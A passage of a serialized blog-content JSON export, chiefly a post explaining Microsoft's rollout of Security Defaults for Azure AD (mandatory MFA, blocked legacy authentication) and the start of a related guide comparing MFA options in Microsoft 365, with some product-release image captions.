77,"value":323784,"nodeType":173},{},[343078],{"type":370},{"data":343080,"content":343081,"nodeType":178},{},[343082],{"data":343083,"marks":343084,"value":323791,"nodeType":173},{},[],{"data":343086,"content":343087,"nodeType":178},{},[343088,343091,343098],{"data":343089,"marks":343090,"value":37,"nodeType":173},{},[],{"data":343092,"content":343093,"nodeType":186},{"uri":323800},[343094],{"data":343095,"marks":343096,"value":323806,"nodeType":173},{},[343097],{"type":194},{"data":343099,"marks":343100,"value":37,"nodeType":173},{},[],{"data":343102,"content":343103,"nodeType":178},{},[343104],{"data":343105,"marks":343106,"value":13836,"nodeType":173},{},[],{"items":343108},[343109],{"sys":343110,"name":117242},{"id":117241},{"items":343112},[343113],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":343114},{"url":282559},{"items":343116},[343117],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":343118},{"url":19129},{"json":343120,"links":343415},{"data":343121,"content":343122,"nodeType":165},{},[343123,343129,343159,343165,343172,343187,343192,343205,343210,343216,343221,343227,343233,343248,343256,343262,343268,343305,343310,343316,343331,343337,343343,343349,343355,343361,343367,343373,343379,343384,343408],{"data":343124,"content":343125,"nodeType":178},{},[343126],{"data":343127,"marks":343128,"value":331925,"nodeType":173},{},[],{"data":343130,"content":343131,"nodeType":250},{},[343132,343141,343150],{"data":343133,"content":343134,"nodeType":254},{},[343135],{"data":343136,"content":343137,"nodeType":178},{},[343138],{"data":343139,"marks":343140,"value":331938,"nodeType":173},{},[],{"data":343142,"content":343143,"nodeType":254},{},[343144],{"data":343145,"content":343146,"nodeType":178},{},[343147],{"data":343148,"marks":343149,"value":331948,"nodeType":173},{},[],{"data":343151,"content":343152,"nodeType":254},{},[343153],{"data":343154,"content":343155,"nodeType":178},{},[343156],{"data":343157,"marks":343158,"value":331958,"nodeType":173},{},[],{"data":343160,"content":343161,"nodeType":169},{},[343162],{"data":343163,"marks":343164,"value":331938,"nodeType":173},{},[],{"data":343166,"content":343167,"nodeType":178},{},[343168],{"data":343169,"marks":343170,"value":331972,"nodeType":173},{},[343171],{"type":1646},{"data":343173,"content":343174,"nodeType":178},{},[343175,343178,343184],{"data":343176,"marks":343177,"value":331979,"nodeType":173},{},[],{"data":343179,"content":343180,"nodeType":186},{"uri":285403},[343181],{"data":343182,"marks":343183,"value":331986,"nodeType":173},{},[],{"data":343185,"marks":343186,"value":39946,"nodeType":173},{},[],{"data":343188,"content":343191,"nodeType":312},{"target":343189},{"sys":343190},{"id":331994,"type":317,"linkType":318},[],{"data":343193,"content":343194,"nodeType":178},{},[343195,343198,343202],{"data":343196,"marks":343197,"value":332002,"nodeType":173},{},[],{"data":343199,"marks":343200,"value":332007,"nodeType":173},{},[343201],{"type":1646},{"data":343203,"marks":343204,"value":332011,"nodeType":173},{},[],{"data":343206,"content":343209,"nodeType":312},{"target":343207},{"sys":343208},{"id":332016,"type":317,"linkType":318},[],{"data":343211,"content":343212,"nodeType":178},{},[343213],{"data":343214,"marks":343215,"value":332024,"nodeType":173},{},[],{"data":343217,"content":343220,"nodeType":312},{"target":343218},{"sys":343219},{"id":332029,"type":317,"linkType":318},[],{"data":343222,"content":343223,"nodeType":178},{},[343224],{"data":343225,"marks":343226,"value":332037,"nodeType":173},{},[],{"data":343228,"content":343229,"nodeType":178},{},[343230],{"data":343231,"marks":343232,"value":332044,"nodeType":173},{},[],{"data":343234,"content":343235,"nodeType":178},{},[343236,343239,343245],{"data":343237,"marks":343238,"value":37,"nodeType":173},{},[],{"data":343240,"content":343241,"nodeType":186},{"uri":332053},[343242],{"data":343243,"marks":343244,"value":332058,"nodeType":173},{},[],{"data":343246,"marks":343247,"value":37,"nodeType":173},{},[],{"data":343249,"content":343252,"nodeType":169},{"target":343250},{"sys":343251},{"id":332066,"type":317,"linkType":318},[343253],{"data":343254,"marks":343255,"value":331948,"nodeType":173},{},[],{"data":343257,"content":343258,"nodeType":178},{},[343259],{"data":343260,"marks":343261,"value":332077,"nodeType":173},{},[],{"data":343263,"content":343264,"nodeType":178},{},[343265],{"data":343266,"marks":343267,"value":332084,"nodeType":173},{},[],{"data":343269,"content":343270,"nodeType":250},{},[343271,343287,343296],{"data":343272,"content":343273,"nodeType":254},{},[343274],{"data":343275,"content":343276,"nodeType":178},{},[343277,343280,343284],{"data":343278,"marks":343279,"value":332097,"nodeType":173},{},[],{"data":343281,"marks":343282,"value":332102,"nodeType":173},{},[343283],{"type":1646},{"data":343285,"marks":343286,"value":332106,"nodeType":173},{},[],{"data":343288,"content":343289,"nodeType":254},{},[343290],{"data":343291,"content":343292,"nodeType":178},{},[343293],{"data":343294,"marks":343295,"value":332116,"nodeType":173},{},[],{"data":343297,"content":343298,"nodeType":254},{},[343299],{"data":343300,"content":343301,"nodeType":178},{},[343302],{"data":343303,"marks":343304,"value":332126,"nodeType":173},{},[],{"data":343306,"content":343309,"nodeType":312},{"target":343307},{"sys":343308},{"id":332131,"type":317,"linkType":318},[],{"data":343311,"content":343312,"nodeType":178},{},[343313],{"data":343314,"marks":343315,"value":37,"nodeType":173},{},[],{"data":343317,"content":343318,"nodeType":178},{},[343319,343322,343328],{"data":343320,"marks":343321,"value":37,"nodeType":173},{},[],{"data":343323,"content":343324,"nodeType":186},{"uri":332147},[343325],{"data":343326,"marks":343327,"value":332058,"nodeType":173},{},[],{"data":343329,"marks":343330,"value":37,"nodeType":173},{},[],{"data":343332,"content":343333,"nodeType":169},{},[343334],{"data":343335,"marks":343336,"value":331958,"nodeType":173},{},[],{"data":343338,"content":343339,"nodeType":178},{},[343340],{"data":343341,"marks":343342,"value":332167,"nodeType":173},{},[],{"data":343344,"content":343345,"nodeType":178},{},[343346],{"data":343347,"marks":343348,"value":332174,"nodeType":173},{},[],{"data":343350,"content":343351,"nodeType":178},{},[343352],{"data":343353,"marks":343354,"value":332181,"nodeType":173},{},[],{"data":343356,"content":343357,"nodeType":178},{},[343358],{"data":343359,"marks":343360,"value":332188,"nodeType":173},{},[],{"data":343362,"content":343363,"nodeType":178},{},[343364],{"data":343365,"marks":343366,"value":332195,"nodeType":173},{},[],{"data":343368,"content":343369,"nodeType":178},{},[343370],{"data":343371,"marks":343372,"value":332202,"nodeType":173},{},[],{"data":343374,"content":343375,"nodeType":178},{},[343376],{"data":343377,"marks":343378,"value":332209,"nodeType":173},{},[],{"data":343380,"content":343383,"nodeType":312},{"target":343381},{"sys":343382},{"id":332214,"type":317,"linkType":318},[],{"data":343385,"content":343386,"nodeType":178},{},[343387,343390,343396,343399,343405],{"data":343388,"marks":343389,"value":332222,"nodeType":173},{},[],{"data":343391,"content":343392,"nodeType":186},{"uri":332225},[343393],{"data":343394,"marks":343395,"value":332230,"nodeType":173},{},[],{"data":343397,"marks":343398,"value":332234,"nodeType":173},{},[],{"data":343400,"content":343401,"nodeType":186},{"uri":332237},[343402],{"data":343403,"marks":343404,"value":323703,"nodeType":173},{},[],{"data":343406,"marks":343407,"value":332245,"nodeType":173},{},[],{"data":343409,"content":343410,"nodeType":178},{},[343411],{"data":343412,"marks":343413,"value":37,"nodeType":173},{},[343414],{"type":194},{"entries":343416},{"hyperlink":343417,"inline":343418,"block":343419},[],[],[343420,343427,343434,343441,343448],{"sys":343421,"__typename":5345,"title":343422,"caption":343423,"layoutMode":112585,"file":343424},{"id":331994},"Example SaaS page: July 22 release post","Visit the SaaS page to see all the SaaS you organization is using. Click on a tile to see who is using each platform.",{"url":343425,"width":277481,"height":343426},"https://images.ctfassets.net/y1cdw1ablpvd/2sS14VapZrnGmuSZj9B1lS/90c9d2409fb3a8b2e0034b95e0429749/Screenshot_2022-07-14_at_16.05.03.png",356,{"sys":343428,"__typename":5345,"title":343429,"caption":343430,"layoutMode":112585,"file":343431},{"id":332016},"Example employee page by SaaS: July 22 blog","See which employees are using which SaaS platforms on the Employees page",{"url":343432,"width":277481,"height":343433},"https://images.ctfassets.net/y1cdw1ablpvd/7IhW6buCo1ZmS0j5QDcdeu/51de35f7eea4bbdb728b015b68def540/Screenshot_2022-07-14_at_17.11.41.png",399,{"sys":343435,"__typename":5345,"title":343436,"caption":343437,"layoutMode":112585,"file":343438},{"id":332029},"Web extension enrolment process","How to enroll the browser extension",{"url":343439,"width":39,"height":343440},"https://images.ctfassets.net/y1cdw1ablpvd/7H6WoMz8ULUg7LvFbML0kZ/ef62e1f21dfd9b885556dc4c20fe7687/enrolment-clean-2.gif",542,{"sys":343442,"__typename":5345,"title":343443,"caption":343444,"layoutMode":112585,"file":343445},{"id":332131},"Example third-party integrations: July 22 blog","See all your third-party integrations in one place to understand which users have given third parties access to their data.",{"url":343446,"width":277481,"height":343447},"https://images.ctfassets.net/y1cdw1ablpvd/IASjOxQqQYIE9OG9wcnA7/10fbd772837e1d012e5f8df1abaf2c49/Screenshot_2022-07-15_at_08.29.18.png",246,{"sys":343449,"__typename":5345,"title":343450,"caption":343451,"layoutMode":112585,"file":343452},{"id":332214},"Example ChatOps page: July 22 release post","Use the new ChatOps screen to control which users can receive messages, which topics users will be messaged about, and which messages have been sent.",{"url":343453,"width":277481,"height":27935},"https://images.ctfassets.net/y1cdw1ablpvd/6eEHBzx8In3pf7RgRjZIRB/22de76ae3de580b0419f7d49c63674e5/Screenshot_2022-07-14_at_16.07.21.png","content:blog:product-release-july-2022.json","blog/product-release-july-2022.json","blog/product-release-july-2022",{"_path":343458,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":343459,"ogImage":118,"summary":343462,"title":343485,"subtitle":118,"metaTitle":343486,"synopsis":343487,"hashTags":118,"publishedDate":343488,"slug":343489,"content":343490,"tagsCollection":343755,"relatedBlogPostsCollection":343761,"authorsCollection":344684,"_id":344688,"_type":5439,"_source":5440,"_file":344689,"_stem":344690,"_extension":5439},"/blog/microsoft-rolls-out-security-defaults-for-azure-ad-to-secure-access",{"id":343460,"publishedAt":343461},"7tv69i16JL4cQiNyD8zlqT","2024-03-21T09:26:29.831Z",{"json":343463},{"data":343464,"content":343465,"nodeType":165},{},[343466],{"data":343467,"content":343468,"nodeType":178},{},[343469,343473,343481],{"data":343470,"marks":343471,"value":343472,"nodeType":173},{},[],"Microsoft is starting to roll out ",{"data":343474,"content":343476,"nodeType":186},{"uri":343475},"https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-security-defaults",[343477],{"data":343478,"marks":343479,"value":343480,"nodeType":173},{},[],"Security Defaults",{"data":343482,"marks":343483,"value":343484,"nodeType":173},{},[]," for Azure AD for those who haven’t turned them on yet. Here’s what you need to know about it to prepare your team.","Microsoft rolls out Security Defaults for Azure AD to secure access","Microsoft rolls out Security Defaults for Azure AD","Microsoft is starting to roll out Security Defaults for Azure AD for those who haven’t turned them on yet. Here’s what you need to know.","2022-06-15T00:00:00.000+01:00","microsoft-rolls-out-security-defaults-for-azure-ad-to-secure-access",{"json":343491,"links":343750},{"data":343492,"content":343493,"nodeType":165},{},[343494,343525,343532,343539,343559,343566,343585,343592,343599,343606,343625,343632,343690,343710,343717,343724,343731],{"data":343495,"content":343496,"nodeType":178},{},[343497,343501,343508,343512,343521],{"data":343498,"marks":343499,"value":343500,"nodeType":173},{},[],"Microsoft announced recently they are starting to roll out ",{"data":343502,"content":343503,"nodeType":186},{"uri":343475},[343504],{"data":343505,"marks":343506,"value":343480,"nodeType":173},{},[343507],{"type":194},{"data":343509,"marks":343510,"value":343511,"nodeType":173},{},[]," for tenants who haven’t already turned them on or are using Conditional Access. Alex Weinhart, Director of Identity Security at Microsoft, wrote up a really ",{"data":343513,"content":343515,"nodeType":186},{"uri":343514},"https://techcommunity.microsoft.com/t5/azure-active-directory-identity/raising-the-baseline-security-for-all-organizations-in-the-world/ba-p/3299048",[343516],{"data":343517,"marks":343518,"value":343520,"nodeType":173},{},[343519],{"type":194},"good summary",{"data":343522,"marks":343523,"value":343524,"nodeType":173},{},[]," of the change that you should read first. ",{"data":343526,"content":343527,"nodeType":178},{},[343528],{"data":343529,"marks":343530,"value":343531,"nodeType":173},{},[],"Security Defaults primarily focuses on leveling up your basic security hygiene, turning on identity and access controls like Multi-Factor Authentication (MFA) for everyone and enforcing greater protection for privileged activities like admin actions or accessing Azure. For smaller IT teams, those without IT teams, or those that simply didn’t know where to start securing Azure AD, this is an incredibly powerful move toward improving their overall security. ",{"data":343533,"content":343534,"nodeType":178},{},[343535],{"data":343536,"marks":343537,"value":343538,"nodeType":173},{},[],"Admins of eligible tenants will receive an email giving them heads up of the change and then, according to Microsoft’s post, will get prompts to enable Security Defaults later this month, which they can defer for up to 14 days so you should let Azure admins and users in your company know ASAP - share this post with them and make sure they understand what to expect. Once enabled, users will then get a further 14 days to register for MFA.",{"data":343540,"content":343541,"nodeType":178},{},[343542,343546,343555],{"data":343543,"marks":343544,"value":343545,"nodeType":173},{},[],"For those of you who have already turned on these defaults or are using Conditional Access, nothing should change. If you’ve previously explicitly opted out of MFA and the other controls included in the defaults, Microsoft says you also ",{"data":343547,"content":343549,"nodeType":186},{"uri":343548},"https://techcommunity.microsoft.com/t5/azure-active-directory-identity/raising-the-baseline-security-for-all-organizations-in-the-world/bc-p/3455314/highlight/true#M4310",[343550],{"data":343551,"marks":343552,"value":343554,"nodeType":173},{},[343553],{"type":194},"won’t be affected",{"data":343556,"marks":343557,"value":343558,"nodeType":173},{},[],". That said, you may also choose to opt out of this rollout – but please don’t! Microsoft has reported 99.9% of hacked accounts don’t have MFA so this change will prevent a lot of attacks.",{"data":343560,"content":343561,"nodeType":235},{},[343562],{"data":343563,"marks":343564,"value":343565,"nodeType":173},{},[],"What’s included in Security Defaults?",{"data":343567,"content":343568,"nodeType":178},{},[343569,343573,343581],{"data":343570,"marks":343571,"value":343572,"nodeType":173},{},[],"Microsoft has a detailed writeup on what Security Defaults means ",{"data":343574,"content":343576,"nodeType":186},{"uri":343575},"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults",[343577],{"data":343578,"marks":343579,"value":28052,"nodeType":173},{},[343580],{"type":194},{"data":343582,"marks":343583,"value":343584,"nodeType":173},{},[],". Primarily, it means all users have to register for MFA and they’ll be prompted to use it when necessary (“based on factors such as location, device, role and task”). Admins, or anyone accessing the Azure portal, have to use MFA on every login. ",{"data":343586,"content":343587,"nodeType":178},{},[343588],{"data":343589,"marks":343590,"value":343591,"nodeType":173},{},[],"Security Defaults also blocks legacy authentication protocols. Microsoft adds, “even if you have a Multi-Factor Authentication policy enabled on your directory, an attacker can authenticate by using an older protocol and bypass Multi-Factor Authentication.” Essentially, if you’re using legacy authentication, MFA really isn’t being enforced and is easily bypassed.",{"data":343593,"content":343594,"nodeType":178},{},[343595],{"data":343596,"marks":343597,"value":343598,"nodeType":173},{},[],"There are a few additional measures taken by the security defaults, so take a look at their full list to know what to expect. ",{"data":343600,"content":343601,"nodeType":235},{},[343602],{"data":343603,"marks":343604,"value":343605,"nodeType":173},{},[],"Do I need to do anything to prepare for the rollout?",{"data":343607,"content":343608,"nodeType":178},{},[343609,343613,343622],{"data":343610,"marks":343611,"value":343612,"nodeType":173},{},[],"We previously wrote some key points to consider when turning on Security Defaults and those are all still valid, so take a look at ",{"data":343614,"content":343616,"nodeType":186},{"uri":343615},"https://pushsecurity.com/blog/how-to-set-up-multi-factor-authentication-for-microsoft-365/",[343617],{"data":343618,"marks":343619,"value":343621,"nodeType":173},{},[343620],{"type":194},"that post",{"data":343623,"marks":343624,"value":1477,"nodeType":173},{},[],{"data":343626,"content":343627,"nodeType":178},{},[343628],{"data":343629,"marks":343630,"value":343631,"nodeType":173},{},[],"There are a few challenges to consider before enabling Security Defaults that we wanted to mention: ",{"data":343633,"content":343634,"nodeType":246189},{},[343635,343645,343655],{"data":343636,"content":343637,"nodeType":254},{},[343638],{"data":343639,"content":343640,"nodeType":178},{},[343641],{"data":343642,"marks":343643,"value":343644,"nodeType":173},{},[],"Everyone needs to use the Microsoft Authenticator, which means everyone needs access to a smartphone they are willing to use to install the app.",{"data":343646,"content":343647,"nodeType":254},{},[343648],{"data":343649,"content":343650,"nodeType":178},{},[343651],{"data":343652,"marks":343653,"value":343654,"nodeType":173},{},[],"MFA will be enforced for all accounts - no exceptions. ",{"data":343656,"content":343657,"nodeType":254},{},[343658],{"data":343659,"content":343660,"nodeType":178},{},[343661,343665,343673,343677,343686],{"data":343662,"marks":343663,"value":343664,"nodeType":173},{},[],"Legacy authentication is blocked. This is a very very good thing, but it may cause some disruption if you aren’t prepared for it. ",{"data":343666,"content":343667,"nodeType":186},{"uri":343514},[343668],{"data":343669,"marks":343670,"value":343672,"nodeType":173},{},[343671],{"type":194},"Microsoft have said",{"data":343674,"marks":343675,"value":343676,"nodeType":173},{},[]," that they are going to initially target organizations who aren’t actively using legacy authentication, but you should still be prepared for the change if you are using it. If you aren’t sure, you can follow ",{"data":343678,"content":343680,"nodeType":186},{"uri":343679},"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#identify-legacy-authentication-use",[343681],{"data":343682,"marks":343683,"value":343685,"nodeType":173},{},[343684],{"type":194},"this guide",{"data":343687,"marks":343688,"value":343689,"nodeType":173},{},[]," to see if legacy authentication is still in use for your tenant. ",{"data":343691,"content":343692,"nodeType":178},{},[343693,343697,343706],{"data":343694,"marks":343695,"value":343696,"nodeType":173},{},[],"If any of those challenges are show stoppers for you, you’ll have to look at other MFA options for 365. Unfortunately, that means you need to make sure everyone has an Azure AD Premium P1 license so you can use ",{"data":343698,"content":343700,"nodeType":186},{"uri":343699},"https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview",[343701],{"data":343702,"marks":343703,"value":343705,"nodeType":173},{},[343704],{"type":194},"Conditional Access",{"data":343707,"marks":343708,"value":343709,"nodeType":173},{},[],". Or, you could opt-out of using Security Defaults, so nothing changes, but we wouldn’t recommend it - all the changes are being made with good reason. ",{"data":343711,"content":343712,"nodeType":235},{},[343713],{"data":343714,"marks":343715,"value":343716,"nodeType":173},{},[],"This is a good thing for security",{"data":343718,"content":343719,"nodeType":178},{},[343720],{"data":343721,"marks":343722,"value":343723,"nodeType":173},{},[],"Overall, this is a very powerful move for security and will level up the security hygiene for all those organizations who don’t have the resources to think hard about security - Microsoft estimates it will enhance the protection of around 60 million accounts! The only downside in our opinion is that to use granular controls (e.g. break glass accounts, enhanced protection for VIPs etc.) around MFA and access, you need to pay for the higher tier Azure AD Premium P1 license and use Conditional Access.",{"data":343725,"content":343726,"nodeType":178},{},[343727],{"data":343728,"marks":343729,"value":343730,"nodeType":173},{},[],"Microsoft’s rationale is that if you have those sorts of “complex requirements”, you should  already be on the higher tier since Security Defaults are intended for organizations who don’t have the resources to consider security.",{"data":343732,"content":343733,"nodeType":178},{},[343734,343738,343746],{"data":343735,"marks":343736,"value":343737,"nodeType":173},{},[],"Should tech leaders require that users pay more to get the strongest access controls to their product? I bet you can guess our answer to that question… Hit us up on ",{"data":343739,"content":343740,"nodeType":186},{"uri":117883},[343741],{"data":343742,"marks":343743,"value":343745,"nodeType":173},{},[343744],{"type":194},"Twitter ",{"data":343747,"marks":343748,"value":343749,"nodeType":173},{},[],"to discuss. ",{"entries":343751},{"hyperlink":343752,"block":343753,"inline":343754},[],[],[],{"items":343756},[343757,343759],{"sys":343758,"name":26137},{"id":26136},{"sys":343760,"name":26133},{"id":26132},{"items":343762},[343763,344266],{"__typename":1528,"sys":343764,"content":343766,"title":344251,"synopsis":344252,"hashTags":344253,"publishedDate":271426,"slug":344255,"tagsCollection":344256,"authorsCollection":344262},{"id":343765},"4mmRSzpyYVed9NMTjePYm6",{"json":343767},{"nodeType":165,"data":343768,"content":343769},{},[343770,343777,343784,343815,343822,343829,343836,343843,343850,343857,343864,343871,343890,343897,343904,343911,343917,343924,343998,344005,344028,344045,344051,344057,344100,344106,344141,344157,344164,344170,344234],{"nodeType":178,"data":343771,"content":343772},{},[343773],{"nodeType":173,"value":343774,"marks":343775,"data":343776},"Microsoft often has lots of flexibility but it can be hard or time-consuming to figure out all the options and make an informed decision. This post summarises your options for using MFA in Microsoft 365, helps you quickly eliminate some, and gives you the information you need to consider what’s left.",[],{},{"nodeType":178,"data":343778,"content":343779},{},[343780],{"nodeType":173,"value":343781,"marks":343782,"data":343783},"At a high level, you’ve got three choices:",[],{},{"nodeType":250,"data":343785,"content":343786},{},[343787,343796,343805],{"nodeType":254,"data":343788,"content":343789},{},[343790],{"nodeType":178,"data":343791,"content":343792},{},[343793],{"nodeType":173,"value":343480,"marks":343794,"data":343795},[],{},{"nodeType":254,"data":343797,"content":343798},{},[343799],{"nodeType":178,"data":343800,"content":343801},{},[343802],{"nodeType":173,"value":343705,"marks":343803,"data":343804},[],{},{"nodeType":254,"data":343806,"content":343807},{},[343808],{"nodeType":178,"data":343809,"content":343810},{},[343811],{"nodeType":173,"value":343812,"marks":343813,"data":343814},"Legacy MFA (also referred to as “per-user MFA”)",[],{},{"nodeType":169,"data":343816,"content":343817},{},[343818],{"nodeType":173,"value":343819,"marks":343820,"data":343821},"Some quick decisions",[],{},{"nodeType":235,"data":343823,"content":343824},{},[343825],{"nodeType":173,"value":343826,"marks":343827,"data":343828},"Do you have Azure AD Premium licenses?",[],{},{"nodeType":178,"data":343830,"content":343831},{},[343832],{"nodeType":173,"value":343833,"marks":343834,"data":343835},"If everyone has Azure AD Premium P1 or higher licenses, you should use Conditional Access. Conditional Access allows you to deploy MFA with full flexibility, from simply mandating it in all situations, to convenience features like exceptions for things like certain IP ranges, apps, or break-glass accounts. A simple setup doesn’t take long but if you’re really looking for quick and easy, you can still use Security Defaults.",[],{},{"nodeType":235,"data":343837,"content":343838},{},[343839],{"nodeType":173,"value":343840,"marks":343841,"data":343842},"Can you deploy to everyone?",[],{},{"nodeType":178,"data":343844,"content":343845},{},[343846],{"nodeType":173,"value":343847,"marks":343848,"data":343849},"If you don’t have Azure AD Premium P1 licenses, but you are comfortable deploying MFA to everyone, you should use Security Defaults. Security Defaults is intended to be the easy-to-deploy MFA option, available to all, regardless of license. Configuration is simply an on/off switch and some very sensible and useful defaults are configured for you but they can’t be changed and no one can be excluded.",[],{},{"nodeType":235,"data":343851,"content":343852},{},[343853],{"nodeType":173,"value":343854,"marks":343855,"data":343856},"Neither applicable?",[],{},{"nodeType":178,"data":343858,"content":343859},{},[343860],{"nodeType":173,"value":343861,"marks":343862,"data":343863},"If you’ve answered no to both questions, your only remaining option is to use Legacy MFA. As the name suggests, this is not an option Microsoft is endorsing or actively developing - their tools and new features are focused purely on Conditional Access or Security Defaults. However, if neither are an option for you, you should at least ensure MFA is configured on your sensitive accounts, like administrators, and per-user MFA can be used to achieve that, regardless of license.",[],{},{"nodeType":235,"data":343865,"content":343866},{},[343867],{"nodeType":173,"value":343868,"marks":343869,"data":343870},"Can I do this if I'm using on-premise AD?",[],{},{"nodeType":178,"data":343872,"content":343873},{},[343874,343878,343886],{"nodeType":173,"value":343875,"marks":343876,"data":343877},"These options will turn on MFA for users that exist in Azure AD, for logins to Azure AD. If you have on-premise AD and you want to start using Azure AD, you need to first look at something like ",[],{},{"nodeType":186,"data":343879,"content":343881},{"uri":343880},"https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect",[343882],{"nodeType":173,"value":343883,"marks":343884,"data":343885},"Azure AD Connect",[],{},{"nodeType":173,"value":343887,"marks":343888,"data":343889}," to sync your users and start your journey in “hybrid” AD.",[],{},{"nodeType":235,"data":343891,"content":343892},{},[343893],{"nodeType":173,"value":343894,"marks":343895,"data":343896},"One last thing…",[],{},{"nodeType":178,"data":343898,"content":343899},{},[343900],{"nodeType":173,"value":343901,"marks":343902,"data":343903},"Regardless of which option you choose, you need to look into disabling “Legacy authentication”. Unrelated to “Legacy MFA”, legacy authentication is just the original way apps authenticated to Azure AD. However, it doesn’t support MFA so leaving it on makes turning on MFA a bit redundant since there will still be a single-factor route into your tenant.",[],{},{"nodeType":178,"data":343905,"content":343906},{},[343907],{"nodeType":173,"value":343908,"marks":343909,"data":343910},"Now that you know which options are available to you let’s explore them in some more detail taking a look at the key features and things you need to think about.",[],{},{"nodeType":169,"data":343912,"content":343913},{},[343914],{"nodeType":173,"value":343480,"marks":343915,"data":343916},[],{},{"nodeType":178,"data":343918,"content":343919},{},[343920],{"nodeType":173,"value":343921,"marks":343922,"data":343923},"Key points:",[],{},{"nodeType":250,"data":343925,"content":343926},{},[343927,343937,343947,343968,343978,343988],{"nodeType":254,"data":343928,"content":343929},{},[343930],{"nodeType":178,"data":343931,"content":343932},{},[343933],{"nodeType":173,"value":343934,"marks":343935,"data":343936},"Requires no license - available to all.",[],{},{"nodeType":254,"data":343938,"content":343939},{},[343940],{"nodeType":178,"data":343941,"content":343942},{},[343943],{"nodeType":173,"value":343944,"marks":343945,"data":343946},"Once enabled, all users will have to register within 14 days of their next login.",[],{},{"nodeType":254,"data":343948,"content":343949},{},[343950],{"nodeType":178,"data":343951,"content":343952},{},[343953,343957,343965],{"nodeType":173,"value":343954,"marks":343955,"data":343956},"Users must register using an “Authenticator” app (",[],{},{"nodeType":186,"data":343958,"content":343960},{"uri":343959},"/blog/which-mfa-methods-should-you-use/",[343961],{"nodeType":173,"value":343962,"marks":343963,"data":343964},"learn more about MFA methods here",[],{},{"nodeType":173,"value":1260,"marks":343966,"data":343967},[],{},{"nodeType":254,"data":343969,"content":343970},{},[343971],{"nodeType":178,"data":343972,"content":343973},{},[343974],{"nodeType":173,"value":343975,"marks":343976,"data":343977},"Once registered, users will be prompted for MFA “as necessary” (i.e. not every time).",[],{},{"nodeType":254,"data":343979,"content":343980},{},[343981],{"nodeType":178,"data":343982,"content":343983},{},[343984],{"nodeType":173,"value":343985,"marks":343986,"data":343987},"Admins will be prompted every time.",[],{},{"nodeType":254,"data":343989,"content":343990},{},[343991],{"nodeType":178,"data":343992,"content":343993},{},[343994],{"nodeType":173,"value":343995,"marks":343996,"data":343997},"Legacy authentication is turned off",[],{},{"nodeType":178,"data":343999,"content":344000},{},[344001],{"nodeType":173,"value":344002,"marks":344003,"data":344004},"Key questions:",[],{},{"nodeType":250,"data":344006,"content":344007},{},[344008,344018],{"nodeType":254,"data":344009,"content":344010},{},[344011],{"nodeType":178,"data":344012,"content":344013},{},[344014],{"nodeType":173,"value":344015,"marks":344016,"data":344017},"Can you enable it for all accounts? Remember, Security Defaults is applied to all accounts that use Azure AD.",[],{},{"nodeType":254,"data":344019,"content":344020},{},[344021],{"nodeType":178,"data":344022,"content":344023},{},[344024],{"nodeType":173,"value":344025,"marks":344026,"data":344027},"Do all users have access to a mobile device? Users will be required to register for the authenticator MFA method, which requires a mobile device. ",[],{},{"nodeType":178,"data":344029,"content":344030},{},[344031,344035,344042],{"nodeType":173,"value":344032,"marks":344033,"data":344034},"Read more here: ",[],{},{"nodeType":186,"data":344036,"content":344037},{"uri":343575},[344038],{"nodeType":173,"value":344039,"marks":344040,"data":344041},"What is Security Defaults?",[],{},{"nodeType":173,"value":37,"marks":344043,"data":344044},[],{},{"nodeType":169,"data":344046,"content":344047},{},[344048],{"nodeType":173,"value":343705,"marks":344049,"data":344050},[],{},{"nodeType":178,"data":344052,"content":344053},{},[344054],{"nodeType":173,"value":343921,"marks":344055,"data":344056},[],{},{"nodeType":250,"data":344058,"content":344059},{},[344060,344070,344080,344090],{"nodeType":254,"data":344061,"content":344062},{},[344063],{"nodeType":178,"data":344064,"content":344065},{},[344066],{"nodeType":173,"value":344067,"marks":344068,"data":344069},"Requires Azure AD Premium P1 licenses",[],{},{"nodeType":254,"data":344071,"content":344072},{},[344073],{"nodeType":178,"data":344074,"content":344075},{},[344076],{"nodeType":173,"value":344077,"marks":344078,"data":344079},"Allows you to create a set of conditions under which users should be allowed access. For example, you can control which users a policy applies to, which apps they are trying to access, how often they should be prompted, where they are logging in from, and which type of device they are permitted to use.",[],{},{"nodeType":254,"data":344081,"content":344082},{},[344083],{"nodeType":178,"data":344084,"content":344085},{},[344086],{"nodeType":173,"value":344087,"marks":344088,"data":344089},"Policies can be put into audit mode first to allow you to ensure they won’t be disruptive.",[],{},{"nodeType":254,"data":344091,"content":344092},{},[344093],{"nodeType":178,"data":344094,"content":344095},{},[344096],{"nodeType":173,"value":344097,"marks":344098,"data":344099},"Legacy authentication should be disabled, but you must do this yourself.",[],{},{"nodeType":178,"data":344101,"content":344102},{},[344103],{"nodeType":173,"value":344002,"marks":344104,"data":344105},[],{},{"nodeType":250,"data":344107,"content":344108},{},[344109,344119],{"nodeType":254,"data":344110,"content":344111},{},[344112],{"nodeType":178,"data":344113,"content":344114},{},[344115],{"nodeType":173,"value":344116,"marks":344117,"data":344118},"Does everyone have the requisite license?",[],{},{"nodeType":254,"data":344120,"content":344121},{},[344122],{"nodeType":178,"data":344123,"content":344124},{},[344125,344129,344137],{"nodeType":173,"value":344126,"marks":344127,"data":344128},"What should your policies look like? Microsoft has a ",[],{},{"nodeType":186,"data":344130,"content":344132},{"uri":344131},"https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/concept-conditional-access-policy-common",[344133],{"nodeType":173,"value":344134,"marks":344135,"data":344136},"sensible set of base policies",[],{},{"nodeType":173,"value":344138,"marks":344139,"data":344140},"; implementing the first four policies listed would replicate Security Defaults.",[],{},{"nodeType":178,"data":344142,"content":344143},{},[344144,344147,344154],{"nodeType":173,"value":344032,"marks":344145,"data":344146},[],{},{"nodeType":186,"data":344148,"content":344149},{"uri":343699},[344150],{"nodeType":173,"value":344151,"marks":344152,"data":344153},"What is Conditional Access?",[],{},{"nodeType":173,"value":37,"marks":344155,"data":344156},[],{},{"nodeType":169,"data":344158,"content":344159},{},[344160],{"nodeType":173,"value":344161,"marks":344162,"data":344163},"Legacy 